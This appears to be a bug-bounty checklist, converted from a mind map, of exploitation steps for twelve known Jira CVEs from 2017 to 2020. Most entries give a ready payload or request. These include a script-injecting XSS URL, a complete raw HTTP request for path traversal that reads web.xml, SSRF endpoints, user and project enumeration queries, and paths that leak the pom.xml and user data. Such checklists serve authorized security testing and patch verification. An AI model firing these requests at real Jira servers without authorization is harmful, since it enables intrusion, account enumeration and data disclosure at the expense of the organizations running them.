1. CVE-2019-3402 (XSS)
    1. 1. Navigate to <JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
    2. 2. Observe that the payload is getting executed.
  2. CVE-2019-3396 (Path Traversal)
    1. 1. Try Below POST Request with the JIRA Target
    2. 2. POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: {{Hostname}} Accept: */* Accept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Referer: {{Hostname}} Content-Length: 168 Connection: close <give an enter and remove this comment> {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
  3. CVE-2019-11581 (Template Injection)
    1. 1. Navigate to <JIRA_URL>/secure/ContactAdministrators!default.jspa
    2. 2. Try the SSTI Payloads
  4. CVE-2020-14179 (Information Disclosure)
    1. 1. Navigate to <JIRA_URL>/secure/QueryComponent!Default.jspa
    2. 2. It leaks information about custom fields, custom SLA, etc.
  5. CVE-2020-14178 (Project Key Enumeration)
    1. 1. Navigate to <JIRA_URL>/browse.<project_key>
    2. 2. Observe the error message on valid vs. invalid project key. Apart from the Enumeration, you can often get unauthenticated access to the project if the protections are not in place.
  6. CVE-2020-14181 (User Enumeration)
    1. 1. Navigate to <JIRA_URL>/secure/ViewUserHover.jspa?username=<username>
    2. 2. Observe the response when valid vs. invalid username is provided.
  7. CVE-2019-3403 (User Enumeration)
    1. 1. Navigate to <Jira_URL>/rest/api/2/user/picker?query=<user_name_here>
    2. 2. Observe the difference in response when valid vs. invalid user is queried.
  8. CVE-2019-8442 (Sensitive Information Disclosure)
    1. 1. Navigate to <JIRA_URL>/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
    2. 2. Observe that the pom.xml file is accessible.
  9. CVE-2019-8449 (User Information Disclosure)
    1. 1. Navigate to <JIRA_URL>/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
    2. 2. Observe that the user related information will be available.
  10. CVE-2019-8451 (SSRF)
    1. 1. Navigate to <JIRA_URL>/plugins/servlet/gadgets/makeRequest?url=https://<host_name>:1337@example.com
  11. CVE-2018-20824 (XSS)
    1. 1. Navigate to <JIRA_URL>/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
    2. 2. Observe that the payload will be executed.
  12. CVE-2017-9506 (SSRF)
    1. Navigate to 1. <JIRA_URL>/plugins/servlet/oauth/users/icon-uri?consumerUri=<SSRF_payload_here>
  13. Use Nuclei Scanner by Project Discovery to Automate detecting Most of these CVEs
    1. MindMap Created By: @harshbothra_